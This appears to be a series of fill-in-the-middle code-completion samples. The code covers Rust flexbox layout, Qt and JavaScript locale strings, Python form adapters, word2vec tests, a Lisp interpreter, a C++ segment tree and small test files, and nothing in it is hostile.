/// https://drafts.csswg.org/css-flexbox/#resolve-flexible-lengths
fn resolve_flexible_lengths(&self, container_main_size: Length) -> (Vec<Length>, Length) {
let mut frozen = vec![false; self.items.len()];
let mut target_main_sizes_vec = self
.items
.iter()
.map(|item| item.flex_base_size)
.collect::<Vec<_>>();
// Using `Cell`s reconciles mutability with multiple borrows in closures
let target_main_sizes = Cell::from_mut(&mut *target_main_sizes_vec).as_slice_of_cells();
let frozen = Cell::from_mut(&mut *frozen).as_slice_of_cells();
let frozen_count = Cell::new(0);
let grow = self.outer_hypothetical_main_sizes_sum < container_main_size;
let flex_factor = |item: &FlexItem| {
let position_style = item.box_.style().get_position();
if grow {
position_style.flex_grow.0
} else {
position_style.flex_shrink.0
}
};
let items = || self.items.iter().zip(target_main_sizes).zip(frozen);
// “Size inflexible items”
for ((item, target_main_size), frozen) in items() {
let is_inflexible = flex_factor(item) == 0. ||
if grow {
item.flex_base_size > item.hypothetical_main_size
} else {
item.flex_base_size < item.hypothetical_main_size
};
if is_inflexible {
frozen_count.set(frozen_count.get() + 1);
frozen.set(true);
target_main_size.set(item.hypothetical_main_size);
}
}
let check_for_flexible_items = || frozen_count.get() < self.items.len();
let free_space = || {
container_main_size -
items()
.map(|((item, target_main_size), frozen)| {
item.pbm_auto_is_zero.main +
if frozen.get() {
target_main_size.get()
} else {
item.flex_base_size
}
})
.sum()
};
// https://drafts.csswg.org/css-flexbox/#initial-free-space
let initial_free_space = free_space();
let unfrozen_items = || {
items().filter_map(|(item_and_target_main_size, frozen)| {
if !frozen.get() {
Some(item_and_target_main_size)
} else {
None
}
})
};
loop {
// https://drafts.csswg.org/css-flexbox/#remaining-free-space
let mut remaining_free_space = free_space();
if !check_for_flexible_items() {
return (target_main_sizes_vec, remaining_free_space);
}
let unfrozen_items_flex_factor_sum: f32 =
unfrozen_items().map(|(item, _)| flex_factor(item)).sum();
// FIXME: I (Simon) transcribed the spec but I don’t yet understand why this algorithm
if unfrozen_items_flex_factor_sum < 1. {
let multiplied = initial_free_space * unfrozen_items_flex_factor_sum;
if multiplied.abs() < remaining_free_space.abs() {
remaining_free_space = multiplied
}
}
// “Distribute free space proportional to the flex factors.”
// FIXME: is it a problem if floating point precision errors accumulate
// and we get not-quite-zero remaining free space when we should get zero here?
if remaining_free_space != Length::zero() {
if grow {
for (item, target_main_size) in unfrozen_items() {
let grow_factor = item.box_.style().get_position().flex_grow.0;
let ratio = grow_factor / unfrozen_items_flex_factor_sum;
target_main_size.set(item.flex_base_size + remaining_free_space * ratio);
}
} else {
// https://drafts.csswg.org/css-flexbox/#scaled-flex-shrink-factor
let scaled_shrink_factor = |item: &FlexItem| {
let shrink_factor = item.box_.style().get_position().flex_shrink.0;
item.flex_base_size * shrink_factor
};
let scaled_shrink_factors_sum: Length = unfrozen_items()
.map(|(item, _)| scaled_shrink_factor(item))
.sum();
for (item, target_main_size) in unfrozen_items() {
let ratio = scaled_shrink_factor(item) / scaled_shrink_factors_sum;
target_main_size
.set(item.flex_base_size - remaining_free_space.abs() * ratio);
}
}
}
// “Fix min/max violations.”
let violation = |(item, target_main_size): (&FlexItem, &Cell<Length>)| {
let size = target_main_size.get();
let clamped = size.clamp_between_extremums(
item.content_min_size.main,
item.content_max_size.main,
);
clamped - size
};
// “Freeze over-flexed items.”
let total_violation: Length = unfrozen_items().map(violation).sum();
if total_violation == Length::zero() {
// “Freeze all items.”
// Return instead, as that’s what the next loop iteration would do.
let remaining_free_space =
container_main_size - target_main_sizes_vec.iter().cloned().sum();
return (target_main_sizes_vec, remaining_free_space);
} else if total_violation > Length::zero() {
// “Freeze all the items with min violations.”
// “If the item’s target main size was made larger by [clamping],
// it’s a min violation.”
for (item_and_target_main_size, frozen) in items() {
if violation(item_and_target_main_size) > Length::zero() {
frozen_count.set(frozen_count.get() + 1);
frozen.set(true);
}
}
} else {
// Negative total violation
// “Freeze all the items with max violations.”
// “If the item’s target main size was made smaller by [clamping],
// it’s a max violation.”
for (item_and_target_main_size, frozen) in items() {
if violation(item_and_target_main_size) < Length::zero() {
frozen_count.set(frozen_count.get() + 1);
frozen.set(true);
}
}
}
}
}
}
impl<'a> FlexItem<'a> {
// Return the hypothetical cross size together with laid out contents of the fragment.
// https://drafts.csswg.org/css-flexbox/#algo-cross-item
// “performing layout as if it were an in-flow block-level box
// with the used main size and the given available space, treating `auto` as `fit-content`.”
fn layout(
&mut self,
used_main_size: Length,
flex_context: &mut FlexContext,
used_cross_size_override: Option<Length>,
) -> FlexItemLayoutResult {
let mut positioning_context = PositioningContext::new_for_rayon(
flex_context
.positioning_context
.collects_for_nearest_positioned_ancestor(),
);
match flex_context.flex_axis {
FlexAxis::Row => {
// The main axis is the container’s inline axis
// https://drafts.csswg.org/css-writing-modes/#orthogonal-flows
assert_eq!(
flex_context.containing_block.style.writing_mode,
self.box_.style().writing_mode,
"Mixed writing modes are not supported yet"
);
// … and also the item’s inline axis.
match self.box_ {
IndependentFormattingContext::Replaced(replaced) => {
let pbm = replaced
.style
.padding_border_margin(flex_context.containing_block);
let size = replaced.contents.used_size_as_if_inline_element(
flex_context.containing_block,
&replaced.style,
&pbm,
);
let cross_size = flex_context.vec2_to_flex_relative(size.clone()).cross;
let fragments = replaced.contents.make_fragments(&replaced.style, size);
FlexItemLayoutResult {
hypothetical_cross_size: cross_size,
fragments,
positioning_context,
}
},
IndependentFormattingContext::NonReplaced(non_replaced) => {
let block_size = match used_cross_size_override {
Some(s) => LengthOrAuto::LengthPercentage(s),
None => self.content_box_size.cross,
};
let item_as_containing_block = ContainingBlock {
inline_size: used_main_size,
block_size,
style: &non_replaced.style,
};
let IndependentLayout {
fragments,
content_block_size,
} = non_replaced.layout(
flex_context.layout_context,
&mut positioning_context,
&item_as_containing_block,
self.tree_rank,
);
let hypothetical_cross_size = self
.content_box_size
.cross
.auto_is(|| content_block_size)
.clamp_between_extremums(
self.content_min_size.cross,
self.content_max_size.cross,
);
FlexItemLayoutResult {
hypothetical_cross_size,
fragments,
positioning_context,
}
},
}
},
FlexAxis::Column => {
todo!()
// Note: this panic shouldn’t happen since the start of `FlexContainer::layout`
// forces `FlexAxis::Row`.
},
}
}
}
impl<'items> FlexLine<'items> {
/// https://drafts.csswg.org/css-flexbox/#algo-cross-line
fn cross_size(
&self,
item_layout_results: &[FlexItemLayoutResult],
flex_context: &FlexContext,
) -> Length {
if flex_context.container_is_single_line {
if let Some(size) = flex_context.container_definite_inner_size.cross {
return size;
}
}
let outer_hypothetical_cross_sizes =
item_layout_results
.iter()
.zip(&*self.items)
.map(|(item_result, item)| {
item_result.hypothetical_cross_size + item.pbm_auto_is_zero.cross
});
// FIXME: add support for `align-self: baseline`
// and computing the baseline of flex items.
// https://drafts.csswg.org/css-flexbox/#baseline-participation
let largest = outer_hypothetical_cross_sizes.fold(Length::zero(), Length::max);
if flex_context.container_is_single_line {
largest.clamp_between_extremums(
flex_context.container_min_cross_size,
flex_context.container_max_cross_size,
)
} else {
largest
}
}
// Return the main-start and main-end margin of each item in the line,
// with `auto` values resolved.
fn resolve_auto_main_margins(
&self,
remaining_free_space: Length,
) -> impl Iterator<Item = (Length, Length)> + '_ {
let each_auto_margin = if remaining_free_space > Length::zero() {
let auto_margins_count = self
.items
.iter()
.map(|item| {
item.margin.main_start.is_auto() as u32 + item.margin.main_end.is_auto() as u32
})
.sum::<u32>();
if auto_margins_count > 0 {
remaining_free_space / auto_margins_count as f32
} else {
Length::zero()
}
} else {
Length::zero()
};
self.items.iter().map(move |item| {
(
item.margin.main_start.auto_is(|| each_auto_margin),
item.margin.main_end.auto_is(|| each_auto_margin),
)
})
}
/// Return the coordinate of the main-start side of the content area of each item
fn align_along_main_axis<'a>(
&'a self,
item_used_main_sizes: &'a [Length],
item_margins: &'a [FlexRelativeSides<Length>],
) -> impl Iterator<Item = Length> + 'a {
// “Align the items along the main-axis”
// FIXME: “per justify-content.”
// For now we hard-code the behavior for `justify-content: flex-start`.
let mut main_position_cursor = Length::zero();
self.items
.iter()
.zip(item_used_main_sizes)
.zip(item_margins)
.map(move |((item, &main_content_size), margin)| {
main_position_cursor +=
margin.main_start + item.border.main_start + item.padding.main_start;
let content_main_start_position = main_position_cursor;
main_position_cursor += main_content_size +
item.padding.main_end +
item.border.main_end +
margin.main_end;
content_main_start_position
})
}
}
impl FlexItem<'_> {
/// Return the cross-start and cross-end margin, with `auto` values resolved.
/// https://drafts.csswg.org/css-flexbox/#algo-cross-margins
fn resolve_auto_cross_margins(
&self,
flex_context: &FlexContext,
line_cross_size: Length,
item_cross_content_size: Length,
) -> (Length, Length) {
let auto_count = match (self.margin.cross_start, self.margin.cross_end) {
(LengthOrAuto::LengthPercentage(start), LengthOrAuto::LengthPercentage(end)) => {
return (start, end);
},
(LengthOrAuto::Auto, LengthOrAuto::Auto) => 2.,
_ => 1.,
};
let outer_size = self.pbm_auto_is_zero.cross + item_cross_content_size;
let available = line_cross_size - outer_size;
let start;
let end;
if available > Length::zero() {
let each_auto_margin = available / auto_count;
start = self.margin.cross_start.auto_is(|| each_auto_margin);
end = self.margin.cross_end.auto_is(|| each_auto_margin);
} else {
// “the block-start or inline-start margin (whichever is in the cross axis)”
// This margin is the cross-end on iff `flex-wrap` is `wrap-reverse`,
// cross-start otherwise.
// We know this because:
// https://drafts.csswg.org/css-flexbox/#flex-wrap-property
// “For the values that are not wrap-reverse,
// the cross-start direction is equivalent to
// either the inline-start or block-start direction of the current writing mode
// (whichever is in the cross axis)
// and the cross-end direction is the opposite direction of cross-start.
// When flex-wrap is wrap-reverse,
// the cross-start and cross-end directions are swapped.”
let flex_wrap = flex_context.containing_block.style.get_position().flex_wrap;
let flex_wrap_reverse = match flex_wrap {
FlexWrap::Nowrap | FlexWrap::Wrap => false,
FlexWrap::WrapReverse => true,
};
// “if the block-start or inline-start margin (whichever is in the cross axis) is auto,
// set it to zero. Set the opposite margin so that the outer cross size of the item
// equals the cross size of its flex line.”
if flex_wrap_reverse {
start = self.margin.cross_start.auto_is(|| available);
end = self.margin.cross_end.auto_is(Length::zero);
} else {
start = self.margin.cross_start.auto_is(Length::zero);
end = self.margin.cross_end.auto_is(|| available);
}
}
(start, end)
}
/// Return the coordinate of the cross-start side of the content area
fn align_along_cross_axis(
&self,
margin: &FlexRelativeSides<Length>,
content_size: &Length,
line_cross_size: Length,
) -> Length {
let outer_cross_start =
if self.margin.cross_start.is_auto() || self.margin.cross_end.is_auto() {
Length::zero()
} else {
match self.align_self {
AlignItems::Stretch | AlignItems::FlexStart => Length::zero(),
AlignItems::FlexEnd => {
let margin_box_cross = *content_size + self.pbm_auto_is_zero.cross;
line_cross_size - margin_box_cross
},
AlignItems::Center => {
let margin_box_cross = *content_size + self.pbm_auto_is_zero.cross;
(line_cross_size - margin_box_cross) / 2.
},
// FIXME: handle baseline alignment
AlignItems::Baseline => Length::zero(),
}
};
outer_cross_start + margin.cross_start + self.border.cross_start + self.padding.cross_start
}
}<|fim▁end|> | // FIXME: implement cases B, C, D.
// Case E: everything else |
<|file_name|>cenzor_tr_TR.ts<|end_file_name|><|fim▁begin|><?xml version="1.0" ?><!DOCTYPE TS><TS language="tr_TR" version="2.1">
<context>
<name>@default</name>
<message>
<source>Chat</source>
<translation type="unfinished"/>
</message>
<message>
<source>Cenzor</source>
<translation type="unfinished"/>
</message>
<message>
<source>General</source>
<translation type="unfinished"/>
</message>
<message>
<source>Enable cenzor</source>
<translation type="unfinished"/>
</message>
<message>
<source>Admonition</source>
<translation type="unfinished"/>
</message>
<message>
<source>Swearwords</source>
<translation type="unfinished"/>
</message>
<message>
<source>Exclusions</source>
<translation type="unfinished"/>
</message>
<message>
<source>Message was cenzored</source>
<translation type="unfinished"/>
</message>
</context>
<context>
<name>CenzorNotificationService</name>
<message><|fim▁hole|> <source>Cenzor</source>
<translation type="unfinished"/>
</message>
<message>
<source>Message was cenzored</source>
<translation type="unfinished"/>
</message>
<message>
<source>Your interlocutor used obscene word and became admonished</source>
<translation type="unfinished"/>
</message>
</context>
<context>
<name>ListEditWidget</name>
<message>
<source>Add</source>
<translation type="unfinished"/>
</message>
<message>
<source>Change</source>
<translation type="unfinished"/>
</message>
<message>
<source>Delete</source>
<translation type="unfinished"/>
</message>
</context>
</TS><|fim▁end|> | |
<|file_name|>_adapters.py<|end_file_name|><|fim▁begin|># -*- coding: ascii -*-
r"""
:Copyright:
Copyright 2007 - 2015
Andr\xe9 Malo or his licensors, as applicable
:License:
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
=====================
HTML forms reloaded
=====================
Form helper classes.
"""
if __doc__:
# pylint: disable = redefined-builtin
__doc__ = __doc__.encode('ascii').decode('unicode_escape')
__author__ = r"Andr\xe9 Malo".encode('ascii').decode('unicode_escape')
__docformat__ = "restructuredtext en"
__all__ = [
'DictParameterAdapter', 'ListDictParameterAdapter',
'MultiDictParameterAdapter', 'NullParameterAdapter',
]
from ._interfaces import ParameterAdapterInterface
class DictParameterAdapter(object):
"""
HTMLForm parameter adapter from a simple dict
:IVariables:
`param` : ``dict``
Parameters
"""
__implements__ = [ParameterAdapterInterface]
def __init__(self, param):
"""
Initialization
:Parameters:
`param` : ``dict``
Parameters
"""
self.param = param
def getfirst(self, name, default=None):
""" :See: ``tdi.tools.htmlform.ParameterAdapterInterface`` """
return self.param.get(name, default)
def getlist(self, name):
""" :See: ``tdi.tools.htmlform.ParameterAdapterInterface`` """
if name in self.param:
return [self.param[name]]
return []
class ListDictParameterAdapter(object):
"""
HTMLForm parameter adapter from a dict of sequences
:IVariables:
`param` : dict of sequences
Parameters
"""
__implements__ = [ParameterAdapterInterface]
def __init__(self, param):
"""
Initialization
:Parameters:
`param` : dict of sequences
Parameters. Empty sequences act as if the key was not present.
Otherwise ``getfirst`` will return the first element and
``getlist`` will return a shallow copy of the sequence as a
``list``.
"""
self.param = param
def getfirst(self, name, default=None):
""" :See: ``tdi.tools.htmlform.ParameterAdapterInterface`` """
try:
result = self.param[name]
except KeyError:
pass
else:
if result:
return result[0]
return default
def getlist(self, name):
""" :See: ``tdi.tools.htmlform.ParameterAdapterInterface`` """
try:
result = self.param[name]
except KeyError:
pass
else:
return list(result)
return []
class MultiDictParameterAdapter(object):
"""
HTMLForm parameter adapter from a multidict (like paste provides)
:IVariables:
`param` : multidict
Parameters
"""
__implements__ = [ParameterAdapterInterface]
def __init__(self, param):
"""
Initialization
:Parameters:
`param` : multidict
Parameters. The object is expected to provide a getall() method
"""
self.param = param
def getfirst(self, name, default=None):
""" :See: ``tdi.tools.htmlform.ParameterAdapterInterface`` """
try:
return self.param.getall(name)[0]
except IndexError:<|fim▁hole|> return default
def getlist(self, name):
""" :See: ``tdi.tools.htmlform.ParameterAdapterInterface`` """
return self.param.getall(name)
class NullParameterAdapter(object):
""" This adapter just returns nothing """
__implements__ = [ParameterAdapterInterface]
def getlist(self, name):
""" :See: `ParameterAdapterInterface.getlist` """
# pylint: disable = unused-argument
return []
def getfirst(self, name, default=None):
""" :See: `ParameterAdapterInterface.getfirst` """
# pylint: disable = unused-argument
return default<|fim▁end|> | |
<|file_name|>01_inventory_not_connected.py<|end_file_name|><|fim▁begin|>#!/usr/bin/env python2.7
# Copyright 2015 Cisco Systems, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on
# an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the
# specific language governing permissions and limitations under the License.
''' Sample usage of function 'inventory_not_connected' to show which devices are mounted, but not connected.
Print the function's documentation then invoke the function and print the output.
'''<|fim▁hole|>from pydoc import render_doc as doc
from pydoc import plain
def main():
print(plain(doc(inventory_not_connected)))
print("inventory_not_connected()")
print_table(inventory_not_connected(), headers='device-name')
if __name__ == "__main__":
main()<|fim▁end|> |
from __future__ import print_function as _print_function
from basics.inventory import inventory_not_connected
from basics.render import print_table |
<|file_name|>da.js<|end_file_name|><|fim▁begin|><|fim▁hole|> * any HTML markup tags in the messages must not be converted or translated.
*
* @see http://github.com/kartik-v/bootstrap-fileinput
*
* NOTE: this file must be saved in UTF-8 encoding.
*/
(function ($) {
"use strict";
$.fn.fileinputLocales['da'] = {
fileSingle: 'fil',
filePlural: 'filer',
browseLabel: 'Browse …',
removeLabel: 'Fjern',
removeTitle: 'Fjern valgte filer',
cancelLabel: 'Fortryd',
cancelTitle: 'Afbryd nuværende upload',
uploadLabel: 'Upload',
uploadTitle: 'Upload valgte filer',
msgNo: 'Ingen',
msgNoFilesSelected: '',
msgCancelled: 'aflyst',
msgZoomModalHeading: 'Detaljeret visning',
msgSizeTooLarge: 'Fil "{name}" (<b>{size} KB</b>) er større end de tilladte <b>{maxSize} KB</b>.',
msgFilesTooLess: 'Du skal mindst vælge <b>{n}</b> {files} til upload.',
msgFilesTooMany: '<b>({n})</b> filer valgt til upload, men maks. <b>{m}</b> er tilladt.',
msgFileNotFound: 'Filen "{name}" blev ikke fundet!',
msgFileSecured: 'Sikkerhedsrestriktioner forhindrer læsning af "{name}".',
msgFileNotReadable: 'Filen "{name}" kan ikke indlæses.',
msgFilePreviewAborted: 'Filpreview annulleret for "{name}".',
msgFilePreviewError: 'Der skete en fejl under læsningen af filen "{name}".',
msgInvalidFileType: 'Ukendt type for filen "{name}". Kun "{types}" kan bruges.',
msgInvalidFileExtension: 'Ukendt filtype for filen "{name}". Kun "{extensions}" filer kan bruges.',
msgUploadAborted: 'Filupload annulleret',
msgUploadThreshold: 'Processing...',
msgValidationError: 'Validering Fejl',
msgLoading: 'Henter fil {index} af {files} …',
msgProgress: 'Henter fil {index} af {files} - {name} - {percent}% færdiggjort.',
msgSelected: '{n} {files} valgt',
msgFoldersNotAllowed: 'Drag & drop kun filer! {n} mappe(r) sprunget over.',
msgImageWidthSmall: 'Bredden af billedet "{name}" skal være på mindst {size} px.',
msgImageHeightSmall: 'Højden af billedet "{name}" skal være på mindst {size} px.',
msgImageWidthLarge: 'Bredden af billedet "{name}" må ikke være over {size} px.',
msgImageHeightLarge: 'Højden af billedet "{name}" må ikke være over {size} px.',
msgImageResizeError: 'Kunne ikke få billedets dimensioner for at ændre størrelsen.',
msgImageResizeException: 'Fejl ved at ændre størrelsen på billedet.<pre>{errors}</pre>',
dropZoneTitle: 'Drag & drop filer her …',
dropZoneClickTitle: '<br>(or click to select {files})',
fileActionSettings: {
removeTitle: 'Fjern fil',
uploadTitle: 'Upload fil',
zoomTitle: 'Se detaljer',
dragTitle: 'Move / Rearrange',
indicatorNewTitle: 'Ikke uploadet endnu',
indicatorSuccessTitle: 'Uploadet',
indicatorErrorTitle: 'Upload fejl',
indicatorLoadingTitle: 'Uploader ...'
},
previewZoomButtonTitles: {
prev: 'View previous file',
next: 'View next file',
toggleheader: 'Toggle header',
fullscreen: 'Toggle full screen',
borderless: 'Toggle borderless mode',
close: 'Close detailed preview'
}
};
})(window.jQuery);<|fim▁end|> | /*!
* FileInput Danish Translations
*
* This file must be loaded after 'fileinput.js'. Patterns in braces '{}', or
|
<|file_name|>tests.rs<|end_file_name|><|fim▁begin|>extern crate word2vec;
use word2vec::wordvectors::WordVector;
const PATH: &'static str = "vectors.bin";
#[test]
fn test_word_cosine() {
let model = WordVector::load_from_binary(PATH).unwrap();
let res = model.cosine("winter", 10).expect("word not found in vocabulary");
assert_eq!(res.len(), 10);
let only_words: Vec<&str> = res.iter().map(|x| x.0.as_ref()).collect();
assert!(!only_words.contains(&"winter"))
}
#[test]
fn test_unexisting_word_cosine() {
let model = WordVector::load_from_binary(PATH).unwrap();
let result = model.cosine("somenotexistingword", 10);
match result {
Some(_) => assert!(false),
None => assert!(true),
}
}
#[test]
fn test_word_analogy() {
let model = WordVector::load_from_binary(PATH).unwrap();
let mut pos = Vec::new();
pos.push("woman");
pos.push("king");
let mut neg = Vec::new();
neg.push("man");
let res = model.analogy(pos, neg, 10).expect("couldn't find all of the given words");
assert_eq!(res.len(), 10);
let only_words: Vec<&str> = res.iter().map(|x| x.0.as_ref()).collect();
assert!(!only_words.contains(&"woman"));
assert!(!only_words.contains(&"king"));
assert!(!only_words.contains(&"man"));
}
#[test]
fn test_word_analogy_with_empty_params() {
let model = WordVector::load_from_binary(PATH).unwrap();
let result = model.analogy(Vec::new(), Vec::new(), 10);<|fim▁hole|> }
}
#[test]
fn test_word_count_is_correctly_returned() {
let v = WordVector::load_from_binary(PATH).unwrap();
assert_eq!(v.word_count(), 71291);
}<|fim▁end|> | match result {
Some(_) => assert!(false),
None => assert!(true), |
<|file_name|>step6_file.rs<|end_file_name|><|fim▁begin|>#![feature(exit_status)]
extern crate mal;
use std::collections::HashMap;
use std::env as stdenv;
use mal::types::{MalVal, MalRet, MalError, err_str};
use mal::types::{symbol, _nil, string, list, vector, hash_map, malfunc};
use mal::types::MalError::{ErrString, ErrMalVal};
use mal::types::MalType::{Nil, False, Sym, List, Vector, Hash_Map, Func, MalFunc};
use mal::{readline, reader, core};
use mal::env::{env_set, env_get, env_new, env_bind, env_root, Env};
// read
fn read(str: String) -> MalRet {
reader::read_str(str)
}
// eval
fn eval_ast(ast: MalVal, env: Env) -> MalRet {
match *ast {
Sym(_) => env_get(&env, &ast),
List(ref a,_) | Vector(ref a,_) => {
let mut ast_vec : Vec<MalVal> = vec![];
for mv in a.iter() {
let mv2 = mv.clone();
ast_vec.push(try!(eval(mv2, env.clone())));
}
Ok(match *ast { List(_,_) => list(ast_vec),
_ => vector(ast_vec) })
}
Hash_Map(ref hm,_) => {
let mut new_hm: HashMap<String,MalVal> = HashMap::new();
for (key, value) in hm.iter() {
new_hm.insert(key.to_string(),
try!(eval(value.clone(), env.clone())));
}
Ok(hash_map(new_hm))
}
_ => Ok(ast.clone()),
}
}
fn eval(mut ast: MalVal, mut env: Env) -> MalRet {
'tco: loop {
//println!("eval: {}, {}", ast, env.borrow());
//println!("eval: {}", ast);
match *ast {
List(_,_) => (), // continue
_ => return eval_ast(ast, env),
}
// apply list
match *ast {
List(_,_) => (), // continue
_ => return Ok(ast),
}
let tmp = ast;
let (args, a0sym) = match *tmp {
List(ref args,_) => {
if args.len() == 0 {
return Ok(tmp.clone());
}
let ref a0 = *args[0];
match *a0 {
Sym(ref a0sym) => (args, &a0sym[..]),
_ => (args, "__<fn*>__"),
}
},
_ => return err_str("Expected list"),
};
match a0sym {
"def!" => {
let a1 = (*args)[1].clone();
let a2 = (*args)[2].clone();
let r = try!(eval(a2, env.clone()));
match *a1 {
Sym(_) => {
env_set(&env.clone(), a1, r.clone());
return Ok(r);
},
_ => return err_str("def! of non-symbol"),
}
},
"let*" => {
let let_env = env_new(Some(env.clone()));<|fim▁hole|> match *a1 {
List(ref binds,_) | Vector(ref binds,_) => {
let mut it = binds.iter();
while it.len() >= 2 {
let b = it.next().unwrap();
let exp = it.next().unwrap();
match **b {
Sym(_) => {
let r = try!(eval(exp.clone(), let_env.clone()));
env_set(&let_env, b.clone(), r);
},
_ => return err_str("let* with non-symbol binding"),
}
}
},
_ => return err_str("let* with non-list bindings"),
}
ast = a2;
env = let_env.clone();
continue 'tco;
},
"do" => {
let el = list(args[1..args.len()-1].to_vec());
try!(eval_ast(el, env.clone()));
ast = args[args.len() - 1].clone();
continue 'tco;
},
"if" => {
let a1 = (*args)[1].clone();
let c = try!(eval(a1, env.clone()));
match *c {
False | Nil => {
if args.len() >= 4 {
ast = args[3].clone();
continue 'tco;
} else {
return Ok(_nil());
}
},
_ => {
ast = args[2].clone();
continue 'tco;
},
}
},
"fn*" => {
let a1 = args[1].clone();
let a2 = args[2].clone();
return Ok(malfunc(eval, a2, env, a1, _nil()));
},
"eval" => {
let a1 = (*args)[1].clone();
ast = try!(eval(a1, env.clone()));
env = env_root(&env);
continue 'tco;
},
_ => { // function call
let el = try!(eval_ast(tmp.clone(), env.clone()));
let args = match *el {
List(ref args,_) => args,
_ => return err_str("Invalid apply"),
};
return match *args.clone()[0] {
Func(f,_) => f(args[1..].to_vec()),
MalFunc(ref mf,_) => {
let mfc = mf.clone();
let alst = list(args[1..].to_vec());
let new_env = env_new(Some(mfc.env.clone()));
match env_bind(&new_env, mfc.params, alst) {
Ok(_) => {
ast = mfc.exp;
env = new_env;
continue 'tco;
},
Err(e) => err_str(&e),
}
},
_ => err_str("attempt to call non-function"),
}
},
}
}
}
// print
fn print(exp: MalVal) -> String {
exp.pr_str(true)
}
fn rep(str: &str, env: Env) -> Result<String,MalError> {
let ast = try!(read(str.to_string()));
//println!("read: {}", ast);
let exp = try!(eval(ast, env));
Ok(print(exp))
}
fn main() {
// core.rs: defined using rust
let repl_env = env_new(None);
for (k, v) in core::ns().into_iter() {
env_set(&repl_env, symbol(&k), v);
}
// see eval() for definition of "eval"
env_set(&repl_env, symbol("*ARGV*"), list(vec![]));
// core.mal: defined using the language itself
let _ = rep("(def! not (fn* (a) (if a false true)))", repl_env.clone());
let _ = rep("(def! load-file (fn* (f) (eval (read-string (str \"(do \" (slurp f) \")\")))))", repl_env.clone());
// Invoked with command line arguments
let args = stdenv::args();
if args.len() > 1 {
let mv_args = args.skip(2)
.map(|a| string(a))
.collect::<Vec<MalVal>>();
env_set(&repl_env, symbol("*ARGV*"), list(mv_args));
let lf = format!("(load-file \"{}\")",
stdenv::args().skip(1).next().unwrap());
return match rep(&lf, repl_env.clone()) {
Ok(_) => stdenv::set_exit_status(0),
Err(str) => {
println!("Error: {:?}", str);
stdenv::set_exit_status(1);
}
};
}
// repl loop
loop {
let line = readline::mal_readline("user> ");
match line { None => break, _ => () }
match rep(&line.unwrap(), repl_env.clone()) {
Ok(str) => println!("{}", str),
Err(ErrMalVal(_)) => (), // Blank line
Err(ErrString(s)) => println!("Error: {}", s),
}
}
}<|fim▁end|> | let a1 = (*args)[1].clone();
let a2 = (*args)[2].clone(); |
<|file_name|>calculate.cpp<|end_file_name|><|fim▁begin|>#include <iostream>
#include <vector>
using namespace std;
const int MOD = 10007;
class SegmentTree {
struct STNode {
int sum;
int prefix;
int suffix;
int product;
STNode() : sum(0), prefix(0), suffix(0), product(0) {}
};
int size;
vector<STNode> tree;
void update(int index, int val, int root, int left, int right);
int lson(int x) { return x << 1; }
int rson(int x) { return (x << 1) | 1; }
public:
SegmentTree(int n) : size(n), tree(n<<2) {}
void update(int index, int val) { update(index, val, 1, 0, size-1); }
int query() { return tree[1].sum; }
};
void SegmentTree::update(int index, int val, int root, int left, int right) {
if (left == index && left == right) {
tree[root].sum = tree[root].prefix = tree[root].suffix = tree[root].product = val % MOD;
} else {
int mid = left + (right-left)/2;
if (index <= mid)
update(index, val, lson(root), left, mid);
else
update(index, val, rson(root), mid+1, right);
tree[root].sum = (tree[lson(root)].sum + tree[rson(root)].sum + tree[lson(root)].suffix * tree[rson(root)].prefix) % MOD;
tree[root].prefix = (tree[lson(root)].prefix + tree[lson(root)].product * tree[rson(root)].prefix) % MOD;
tree[root].suffix = (tree[rson(root)].suffix + tree[lson(root)].suffix * tree[rson(root)].product) % MOD;
tree[root].product = (tree[lson(root)].product * tree[rson(root)].product) % MOD;
}
}<|fim▁hole|>{
ios::sync_with_stdio(false);
cin.tie(nullptr);
int n, q;
cin >> n >> q;
SegmentTree st(n);
for (int i = 0; i < q; ++i) {
int a, b;
cin >> a >> b;
st.update(a-1, b);
cout << st.query() << '\n';
}
cout << flush;
return 0;
}<|fim▁end|> |
int main(void) |
<|file_name|>configs-multiline_match_arm_forces_block-false.rs<|end_file_name|><|fim▁begin|>// rustfmt-multiline_match_arm_forces_block: false
// Option forces multiline match arm bodies to be wrapped in a block
fn main() {
match lorem {
Lorem::Ipsum => if ipsum {<|fim▁hole|> println!("dolor");
},
Lorem::Dolor => println!("amet"),
}
}<|fim▁end|> | |
<|file_name|>test-branches.py<|end_file_name|><|fim▁begin|>from . import common
import hglib
class test_branches(common.basetest):
def test_empty(self):
self.assertEquals(self.client.branches(), [])
def test_basic(self):
self.append('a', 'a')
rev0 = self.client.commit('first', addremove=True)
self.client.branch('foo')
self.append('a', 'a')
rev1 = self.client.commit('second')
branches = self.client.branches()
expected = []
for r, n in (rev1, rev0):
r = self.client.log(r)[0]<|fim▁hole|> self.assertEquals(branches, expected)
def test_active_closed(self):
pass<|fim▁end|> | expected.append((r.branch, int(r.rev), r.node[:12]))
|
<|file_name|>testUrl.py<|end_file_name|><|fim▁begin|>import urllib2
url = "http://ifolderlinks.ru/404"
req = urllib2.Request(url)<|fim▁hole|>response = urllib2.urlopen(req,timeout=3)
#except urllib2.HTTPError as e:
# print 'The server couldn\'t fulfill the request.'
# print 'Error code: ', e.code
print response.info()
#print response.read()<|fim▁end|> | #try: |
<|file_name|>niche-filling.rs<|end_file_name|><|fim▁begin|>// Copyright 2016 The Rust Project Developers. See the COPYRIGHT
// file at the top-level directory of this distribution and at
// http://rust-lang.org/COPYRIGHT.
//
// Licensed under the Apache License, Version 2.0 <LICENSE-APACHE or
// http://www.apache.org/licenses/LICENSE-2.0> or the MIT license
// <LICENSE-MIT or http://opensource.org/licenses/MIT>, at your
// option. This file may not be copied, modified, or distributed
// except according to those terms.
// compile-flags: -Z print-type-sizes
// compile-pass
// This file illustrates how niche-filling enums are handled,
// modelled after cases like `Option<&u32>`, `Option<bool>` and such.
//
// It uses NonZeroU32 rather than `&_` or `Unique<_>`, because
// the test is not set up to deal with target-dependent pointer width.
//
